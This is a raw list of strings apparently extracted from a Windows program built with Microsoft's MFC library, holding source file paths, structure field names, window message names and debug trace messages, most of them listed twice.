f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp
m_ofn.lpstrCustomFilter =
m_ofn.lpstrCustomFilter =
m_ofn.lpstrFilter =
m_ofn.lpstrFilter =
m_ofn.nFileExtension =
m_ofn.nFileExtension =
m_ofn.nFileOffset =
m_ofn.nFileOffset =
m_ofn.lpstrDefExt =
m_ofn.lpstrDefExt =
m_ofn.Flags =
m_ofn.Flags =
m_ofn.lpstrTitle =
m_ofn.lpstrTitle =
m_ofn.nMaxFileTitle =
m_ofn.nMaxFileTitle =
m_ofn.lpstrFileTitle =
m_ofn.lpstrFileTitle =
m_ofn.nMaxFile =
m_ofn.nMaxFile =
m_ofn.lpstrFile =
m_ofn.lpstrFile =
m_ofn.nFilterIndex =
m_ofn.nFilterIndex =
m_ofn.hwndOwner =
m_ofn.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp
m_psp.dwFlags =
m_psp.dwFlags =
PropertySheet() failed: GetLastError returned %d
PropertySheet() failed: GetLastError returned %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
WM_HOTKEY
WM_HOTKEY
WM_SETHOTKEY
WM_SETHOTKEY
WM_IDLEUPDATECMDUI
WM_IDLEUPDATECMDUI
WM_DDE_EXECUTE
WM_DDE_EXECUTE
WM_KEYLAST
WM_KEYLAST
WM_SYSKEYUP
WM_SYSKEYUP
WM_SYSKEYDOWN
WM_SYSKEYDOWN
WM_KEYUP
WM_KEYUP
WM_KEYDOWN
WM_KEYDOWN
WM_VKEYTOITEM
WM_VKEYTOITEM
WM_CTLCOLORMSGBOX
WM_CTLCOLORMSGBOX
%s: hwnd=0xX, msg = 0xX (0xX, 0xX)
%s: hwnd=0xX, msg = 0xX (0xX, 0xX)
%s: hwnd=0xX, msg = %hs (0xX, 0xX)
%s: hwnd=0xX, msg = %hs (0xX, 0xX)
WM_USER 0xX
WM_USER 0xX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d
%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d
%s: Execute '%s'.
%s: Execute '%s'.
Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.
Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.
Warning: failed to reclaim %d bytes for memory safety pool.
Warning: failed to reclaim %d bytes for memory safety pool.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
Warning: could not get volume information '%s'.
Warning: could not get volume information '%s'.
Warning: could not parse the path '%s'. Path is too long.
Warning: could not parse the path '%s'. Path is too long.
Warning: could not parse the path '%s'.
Warning: could not parse the path '%s'.
kernel32.dll
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Error: failed to execute DDE command '%s'.
Error: failed to execute DDE command '%s'.
Warning: DDE command '%s' ignored because window is disabled.
Warning: DDE command '%s' ignored because window is disabled.
Warning: no message line prompt for ID 0xX.
Warning: no message line prompt for ID 0xX.
Warning: OnUpdateKeyIndicator - unknown indicator 0xX.
Warning: OnUpdateKeyIndicator - unknown indicator 0xX.
Warning: scroll bars in frame windows may cause unusual behaviour.
Warning: scroll bars in frame windows may cause unusual behaviour.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp
IOleInPlaceObject not supported on OLE control (dialog ID %d).
IOleInPlaceObject not supported on OLE control (dialog ID %d).
Persistence not supported on OLE control %ls.
Persistence not supported on OLE control %ls.
%d. Column ordinal %d: Binding as native data type
%d. Column ordinal %d: Binding as native data type
%d. Column ordinal %d: Binding a COM object
%d. Column ordinal %d: Binding a COM object
F%d. Column ordinal %d: Binding as an IStream object
F%d. Column ordinal %d: Binding as an IStream object
%d. Column ordinal %d: Binding as an ISequentialStream object
%d. Column ordinal %d: Binding as an ISequentialStream object
neither ISequentialStream nor IStream are supported!
neither ISequentialStream nor IStream are supported!
IStream is supported
IStream is supported
FISequentialStream is supported
FISequentialStream is supported
Testing streams support...
Testing streams support...
%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory
%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory
%d. Column ordinal %d: Binding length and status ONLY
%d. Column ordinal %d: Binding length and status ONLY
Number of columns: %d
Number of columns: %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h
Dw=Binding entry %d failed. Status: %d
Dw=Binding entry %d failed. Status: %d
Unsupported DBTYPE (%d) in column %d
Unsupported DBTYPE (%d) in column %d
$@Column %d not bound
$@Column %d not bound
GetData failed - HRESULT = 0x%X
GetData failed - HRESULT = 0x%X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp
ole32.dll
ole32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
Error: no data exchange control with ID 0xX.
Error: no data exchange control with ID 0xX.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
Warning: dialog data checkbox value (%d) out of range.
Warning: dialog data checkbox value (%d) out of range.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp
Error: failed to load AfxFormatString string 0xx.
Error: failed to load AfxFormatString string 0xx.
Error: illegal string index requested %d.
Error: illegal string index requested %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
%sDockingManager-%d
%sDockingManager-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
CMenuImages. Can't load menu images %x
CMenuImages. Can't load menu images %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
KeyboardManager
KeyboardManager
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
Setting of tab order failed, error code: %x
Setting of tab order failed, error code: %x
Registration of tab failed, error code: %x
Registration of tab failed, error code: %x
Creation of tab proxy window failed, error code: %d
Creation of tab proxy window failed, error code: %d
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
SetTaskbarThumbnailClipRect failed with code %x.
SetTaskbarThumbnailClipRect failed with code %x.
pfnSetIconicThumbnail failed with code %x
pfnSetIconicThumbnail failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
CMDIFrameWndEx
CMDIFrameWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
Can't open URL: %s
Can't open URL: %s
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
Can't load bitmap: %x
Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
Error: unknown image type '%u'
Error: unknown image type '%u'
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
Can't create dialog: %s
Can't create dialog: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
DeferWindowPos failded, error code %d
DeferWindowPos failded, error code %d
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
SetActiveTab: illegal tab number %d
SetActiveTab: illegal tab number %d
EnsureVisible: illegal tab number %d
EnsureVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
m_stgMedium.tymed =
m_stgMedium.tymed =
m_formatEtc.tymed =
m_formatEtc.tymed =
m_formatEtc.lindex =
m_formatEtc.lindex =
m_formatEtc.dwAspect =
m_formatEtc.dwAspect =
m_formatEtc.pdt =
m_formatEtc.pdt =
m_formatEtc.cfFormat =
m_formatEtc.cfFormat =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
m_rectStartDrag.bottom =
m_rectStartDrag.bottom =
m_rectStartDrag.right =
m_rectStartDrag.right =
m_rectStartDrag.top =
m_rectStartDrag.top =
m_rectStartDrag.left =
m_rectStartDrag.left =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
Last error = %x
Last error = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
ShowCmd
ShowCmd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
Can't invoke command: %s
Can't invoke command: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
Empty command in user-defined tool: %d
Empty command in user-defined tool: %d
CUserTool::CopyIconToClipboard error. Error code = %x
CUserTool::CopyIconToClipboard error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
RemoveTab: illegal tab number %d
RemoveTab: illegal tab number %d
ShowTab: illegal tab number %d
ShowTab: illegal tab number %d
IsTabVisible: illegal tab number %d
IsTabVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
CMFCTabCtrl::SetImageList Can't load bitmap: %x
CMFCTabCtrl::SetImageList Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
%c%d%c%s
%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
m_cc.lpCustColors
m_cc.lpCustColors
m_cc.Flags =
m_cc.Flags =
m_cc.rgbResult =
m_cc.rgbResult =
m_cc.hwndOwner =
m_cc.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp
Warning: OleInitialize returned scode = %s.
Warning: OleInitialize returned scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
